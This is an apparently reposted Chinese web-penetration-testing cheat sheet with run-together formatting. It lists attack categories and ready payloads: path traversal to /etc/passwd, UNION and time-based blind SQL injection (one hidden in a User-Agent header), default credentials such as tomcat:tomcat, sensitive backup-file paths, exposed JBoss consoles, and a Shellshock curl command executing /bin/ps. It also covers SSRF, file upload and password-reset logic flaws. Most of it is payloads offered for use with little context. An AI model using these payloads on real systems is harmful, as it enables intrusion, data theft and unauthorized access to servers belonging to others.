Type:
任意文件读取
../../../../../../../../../../etc/passwd%00/etc/sysconfig/network../../../foo/../../../../etc/passwd //nodejsSQL注入
and 1=2 union select 1,2,version(),3%23 blind sqli error sqli 宽字节注入框架注入(ThinkPHP)GET POST 参数伪静态 *RefererUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'弱口令
Username:中国姓名排行TOP500 Password:admin admin123 qyer //字典的重要性!!!/manager/html tomcat:tomcatftp 弱口令 phpmyadmin 弱口令敏感信息泄露
.bak /.svn/entries wwwroot.tar.gz .swp web.rar %domain%.zip %dictionary%.raropenssl目录遍历shodangithub 敏感信息.NET 相关类 逆向解密 dllapi 接口泄露社工库查询相关人员信息未授权访问
RSYNC 匿名访问JBoss:/jmx-console/ /admin-console/命令执行
CMS(discuz、)命令执行curl http://1XX.XX.XX.XX:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -khttp://test.xxx.com:8082/struts_spy/example/HelloWorld.action //struts2任意文件上传
cer、SSRF
url= //ip服务DNS Rebinding 绕过设计缺陷
验证码可识别水平越权,修改相关参数任意用户邮箱地址查询:修改对应查询参数任意密码重置:验证身份token简单可爆破单点登陆绕过:其它参数替代绕过
转载于:https://www.cnblogs.com/skrr/p/10987425.html